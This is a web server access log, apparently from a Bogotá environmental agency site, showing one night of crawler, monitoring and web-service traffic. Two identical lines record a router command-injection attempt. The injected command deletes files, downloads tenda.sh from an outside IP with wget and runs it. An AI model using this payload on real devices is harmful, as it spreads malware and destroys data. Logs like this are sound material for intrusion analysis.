186.102.67.233 - - [17/Feb/2024:03:00:41 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+4djzH/HnesdNrN5n3M3ru6iIKnTKCug4BdxMYw3w12Hwz6UUxAbSau4rHIW6el4+fesRgeEGhSc9C1EI5+o4FC/YP+IXvDgHX2B4DlEpJpcHd1YKUnGeNYgUCrJsKu06Ty9h4YQX2bGMTzWnYJU3In3kj4YyQa7I=&u=U2FsdGVkX1/ja3qxpCyPtW3Eru1ffq5TCxEWVIexmSnKEaz8H6XQBnhqUkhoOquR&y=U2FsdGVkX18Py6q+8A5bi2PGkGGENFeDgwrbaYHxi9YimiK/vnz8hYB/mTVJGnfp HTTP/1.1" 200 26
186.102.67.233 - - [17/Feb/2024:03:00:41 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19awZFkFphLk9+7gUqhQ5Xs+3Go3taf3thSQI+XK2Rmu79/F5Iako7Ldnuplkzmi1Nv3YTiFfYR/dSG6FDFZdo8NqguJmczmIkepHSk+2ynl6Oq/kQ3O/1YiX1wUNVzUadj31PJmW/g7A6k+ODmHsE/YTCivqXJKs0=&u=U2FsdGVkX1/ja3qxpCyPtW3Eru1ffq5TCxEWVIexmSnKEaz8H6XQBnhqUkhoOquR&y=U2FsdGVkX18Py6q+8A5bi2PGkGGENFeDgwrbaYHxi9YimiK/vnz8hYB/mTVJGnfp HTTP/1.1" 200 26
186.102.67.233 - - [17/Feb/2024:03:00:41 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18gTPOmiszF9Z05CtVmmqriX8DcROgvQ2NTTEseLziinv2C5Ty62QvwEzd+/vAiXhCsA05BzHOHYymxAoo6+mQHpCs/Z7Rvmttz1xATlDvfnywtdMbk8EXTouJZfeL8cGUGwmWf+D47AVY3vxy0Dj93241aaHIEsHYogf8+BljM3pZAcc9LQkQc/plFxb9ENYbnBw9gpnkcag==&u=U2FsdGVkX1/ja3qxpCyPtW3Eru1ffq5TCxEWVIexmSnKEaz8H6XQBnhqUkhoOquR&y=U2FsdGVkX18Py6q+8A5bi2PGkGGENFeDgwrbaYHxi9YimiK/vnz8hYB/mTVJGnfp HTTP/1.1" 200 26
216.245.221.92 - - [17/Feb/2024:03:02:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:02:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
40.77.167.67 - - [17/Feb/2024:03:03:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2236.pdf HTTP/1.1" 200 391426
165.227.146.109 - - [17/Feb/2024:03:04:08 -0500] "GET /signin HTTP/1.1" 404 1018
172.22.2.4 - - [17/Feb/2024:03:02:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:03:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.73.100 - - [17/Feb/2024:03:06:48 -0500] "GET /Publicaciones/2023EE307980.pdf HTTP/1.1" 404 228
66.249.73.100 - - [17/Feb/2024:03:06:49 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
216.245.221.92 - - [17/Feb/2024:03:07:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:07:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:03:08:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:09:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:03:12:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:12:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:03:14:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:15:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
172.22.2.4 - - [17/Feb/2024:03:16:51 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
216.245.221.92 - - [17/Feb/2024:03:17:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:16:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [17/Feb/2024:03:16:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [17/Feb/2024:03:17:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
52.167.144.168 - - [17/Feb/2024:03:18:48 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/Historico/Modificaciones%20pptales%202017.xlsx HTTP/1.1" 404 1018
201.245.192.253 - - [17/Feb/2024:03:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37029
201.245.192.253 - - [17/Feb/2024:03:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
201.245.192.253 - - [17/Feb/2024:03:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38168
201.245.192.253 - - [17/Feb/2024:03:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
162.55.38.160 - - [17/Feb/2024:03:20:28 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Feb/2024:03:20:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Feb/2024:03:22:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:20:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [17/Feb/2024:03:22:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
52.167.144.140 - - [17/Feb/2024:03:25:41 -0500] "GET /BLA/resoluciones/AUTOS%202022/1867.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Feb/2024:03:24:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.245.221.92 - - [17/Feb/2024:03:27:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:25:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:27:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:03:26:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
207.46.13.126 - - [17/Feb/2024:03:28:37 -0500] "GET /images/asistentes%20Foro%20sobre%20movilidad%20sostenible.jpg HTTP/1.1" 200 46965
201.245.192.253 - - [17/Feb/2024:03:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37029
201.245.192.253 - - [17/Feb/2024:03:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
201.245.192.253 - - [17/Feb/2024:03:29:27 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [17/Feb/2024:03:29:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38168
201.245.192.253 - - [17/Feb/2024:03:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
216.245.221.92 - - [17/Feb/2024:03:32:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:32:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:03:31:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
162.55.173.23 - - [17/Feb/2024:03:33:56 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Feb/2024:03:32:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [17/Feb/2024:03:37:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:37:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
201.245.192.253 - - [17/Feb/2024:03:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37029
201.245.192.253 - - [17/Feb/2024:03:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
172.22.2.4 - - [17/Feb/2024:03:37:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:39:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38168
172.22.2.4 - - [17/Feb/2024:03:38:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
201.245.192.253 - - [17/Feb/2024:03:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
20.120.134.34 - - [17/Feb/2024:03:40:19 -0500] "GET /Publicaciones/2024EE18485.pdf HTTP/1.1" 404 227
216.245.221.92 - - [17/Feb/2024:03:42:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:42:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:03:43:08 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%206%20del%2025%20de%20Mayo%20de%202012.pdf HTTP/1.1" 200 387391
172.22.2.4 - - [17/Feb/2024:03:43:23 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 52349
172.22.2.4 - - [17/Feb/2024:03:43:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:45:06 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [17/Feb/2024:03:44:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54904
216.245.221.92 - - [17/Feb/2024:03:47:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:47:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:03:49:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:50:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:03:52:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:03:52:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
52.167.144.137 - - [17/Feb/2024:03:56:35 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
52.167.144.137 - - [17/Feb/2024:03:56:35 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12405
172.22.2.4 - - [17/Feb/2024:03:55:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Feb/2024:03:57:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:03:55:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [17/Feb/2024:03:57:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
216.245.221.92 - - [17/Feb/2024:04:02:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:00:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:02:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
162.55.43.55 - - [17/Feb/2024:04:03:09 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Feb/2024:04:01:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
172.22.2.4 - - [17/Feb/2024:04:06:00 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2005%20del%2013%20de%20Junio%20de%202017.pdf HTTP/1.1" 200 853105
172.22.2.4 - - [17/Feb/2024:04:06:04 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
66.249.73.102 - - [17/Feb/2024:04:06:42 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 200 253045
216.245.221.92 - - [17/Feb/2024:04:07:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:07:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:04:06:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:07:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [17/Feb/2024:04:12:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:12:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:04:12:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:13:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
52.167.144.145 - - [17/Feb/2024:04:17:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/6161.pdf HTTP/1.1" 304 -
216.245.221.92 - - [17/Feb/2024:04:17:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:17:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
135.181.75.58 - - [17/Feb/2024:04:18:59 -0500] "GET /robots.txt HTTP/1.1" 404 1034
135.181.75.58 - - [17/Feb/2024:04:19:01 -0500] "GET /desde-el-paramo-mas-grande-del-mundo-sumapaz-bogota-se-alista-para-ser-sede-de-la-cop16.html HTTP/1.1" 200 981
201.245.192.253 - - [17/Feb/2024:04:19:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37024
52.167.144.17 - - [17/Feb/2024:04:19:11 -0500] "GET /BLA/resoluciones/AUTOS%202019/0357.pdf HTTP/1.1" 304 -
201.245.192.253 - - [17/Feb/2024:04:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
201.245.192.253 - - [17/Feb/2024:04:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
172.22.2.4 - - [17/Feb/2024:04:18:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
172.22.2.4 - - [17/Feb/2024:04:19:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:04:22:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:22:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
40.77.167.41 - - [17/Feb/2024:04:22:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/3747.pdf HTTP/1.1" 200 344628
172.22.2.4 - - [17/Feb/2024:04:24:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:25:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:04:27:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:27:24 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000001%20DEL%2011%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 298890
201.245.192.253 - - [17/Feb/2024:04:27:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
201.245.192.253 - - [17/Feb/2024:04:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37024
201.245.192.253 - - [17/Feb/2024:04:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
201.245.192.253 - - [17/Feb/2024:04:29:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
201.245.192.253 - - [17/Feb/2024:04:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
52.167.144.192 - - [17/Feb/2024:04:30:25 -0500] "GET /bla/resoluciones/resoluciones%202012/0848.pdf HTTP/1.1" 200 238220
69.171.231.119 - - [17/Feb/2024:04:31:17 -0500] "GET /images/27%20de%20enero%20Soratama.jpg HTTP/1.1" 200 63397
172.22.2.4 - - [17/Feb/2024:04:30:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Feb/2024:04:32:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:32:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:04:30:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
114.119.132.238 - - [17/Feb/2024:04:32:54 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/DISCIPLINARIOS%2B2019/&sort=date&order=desc HTTP/1.1" 200 14379
185.224.128.55 - - [17/Feb/2024:04:35:48 -0500] "GET / HTTP/1.1" 200 319
66.249.73.100 - - [17/Feb/2024:04:36:43 -0500] "GET /Publicaciones/2023EE306424.pdf HTTP/1.1" 404 228
216.245.221.92 - - [17/Feb/2024:04:37:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:37:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:04:35:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:36:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [17/Feb/2024:04:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37024
201.245.192.253 - - [17/Feb/2024:04:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
201.245.192.253 - - [17/Feb/2024:04:39:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
201.245.192.253 - - [17/Feb/2024:04:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36645
66.249.73.102 - - [17/Feb/2024:04:40:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer? HTTP/1.1" 503 1020
216.245.221.92 - - [17/Feb/2024:04:42:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:42:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
66.249.73.100 - - [17/Feb/2024:04:42:27 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/22_proye/xtras_in/cni_3.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [17/Feb/2024:04:41:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:42:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:04:47:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:47:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:04:48:03 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [17/Feb/2024:04:48:07 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [17/Feb/2024:04:48:08 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [17/Feb/2024:04:48:08 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
199.16.157.183 - - [17/Feb/2024:04:48:32 -0500] "GET /con-pinceles-y-acuarelas-veronica-martinez-protege-la-biodiversidad.html HTTP/1.1" 200 990
199.16.157.180 - - [17/Feb/2024:04:48:33 -0500] "GET /images/cronica-mujer-biodiveridad-30-noviembre.jpg HTTP/1.1" 200 63270
172.22.2.4 - - [17/Feb/2024:04:47:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:48:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:04:52:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:52:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
66.249.73.101 - - [17/Feb/2024:04:53:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0416.pdf HTTP/1.1" 200 294437
185.224.128.10 - - [17/Feb/2024:04:54:14 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
185.224.128.10 - - [17/Feb/2024:04:54:14 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.142.214.108%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
52.167.144.17 - - [17/Feb/2024:04:54:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2658.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Feb/2024:04:53:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:04:54:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.73.101 - - [17/Feb/2024:04:57:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0794.pdf HTTP/1.1" 200 452114
216.245.221.92 - - [17/Feb/2024:04:57:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:04:57:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
66.249.73.100 - - [17/Feb/2024:04:59:58 -0500] "GET /BLA/resoluciones/Autos%202008/2021.pdf HTTP/1.1" 200 74692
66.249.73.101 - - [17/Feb/2024:05:00:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202701%20AL%202800/RESOLUCION%202734%20DE%202007.pdf HTTP/1.1" 200 388615
172.22.2.4 - - [17/Feb/2024:04:59:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:05:00:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:05:02:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:02:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:05:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.102 - - [17/Feb/2024:05:06:46 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/5455.pdf HTTP/1.1" 200 3964896
66.249.73.101 - - [17/Feb/2024:05:06:49 -0500] "GET /Publicaciones/2023EE297102.pdf HTTP/1.1" 404 228
216.245.221.92 - - [17/Feb/2024:05:07:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:07:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
66.249.73.102 - - [17/Feb/2024:05:07:28 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/0272.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Feb/2024:05:05:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.73.101 - - [17/Feb/2024:05:07:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5689.pdf HTTP/1.1" 200 248802
216.245.221.92 - - [17/Feb/2024:05:12:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:12:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:10:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:05:13:06 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 304 -
172.22.2.4 - - [17/Feb/2024:05:11:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.73.102 - - [17/Feb/2024:05:16:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0427.pdf HTTP/1.1" 200 265237
216.245.221.92 - - [17/Feb/2024:05:17:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:17:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:16:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:19:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37032
201.245.192.253 - - [17/Feb/2024:05:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36627
172.22.2.4 - - [17/Feb/2024:05:17:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [17/Feb/2024:05:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38163
201.245.192.253 - - [17/Feb/2024:05:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36627
66.249.66.20 - - [17/Feb/2024:05:21:30 -0500] "GET /BLA/resoluciones/Autos%202008/3180.pdf HTTP/1.1" 200 205045
66.249.66.21 - - [17/Feb/2024:05:21:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1996.pdf HTTP/1.1" 200 235537
216.245.221.92 - - [17/Feb/2024:05:22:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:22:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:22:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:05:23:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [17/Feb/2024:05:27:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:27:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
201.245.192.253 - - [17/Feb/2024:05:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37032
201.245.192.253 - - [17/Feb/2024:05:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36627
201.245.192.253 - - [17/Feb/2024:05:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38163
172.22.2.4 - - [17/Feb/2024:05:28:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36627
172.22.2.4 - - [17/Feb/2024:05:29:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
157.55.39.8 - - [17/Feb/2024:05:31:32 -0500] "GET /portaldeninos/?s=2024 HTTP/1.1" 200 85855
216.245.221.92 - - [17/Feb/2024:05:32:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:32:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:32:43 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
66.249.66.38 - - [17/Feb/2024:05:33:44 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.66.37 - - [17/Feb/2024:05:33:44 -0500] "GET /carolina-urrutia-tener-trazado-un-camino-en-el-que-cada-sector-sepa-lo-que-invierte-sacrifica-y-gana-es-lo-que-dejara-la-politica-de-accion-climatica-para-bogota.html HTTP/1.1" 200 856
66.249.66.19 - - [17/Feb/2024:05:34:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0019.pdf HTTP/1.1" 200 277930
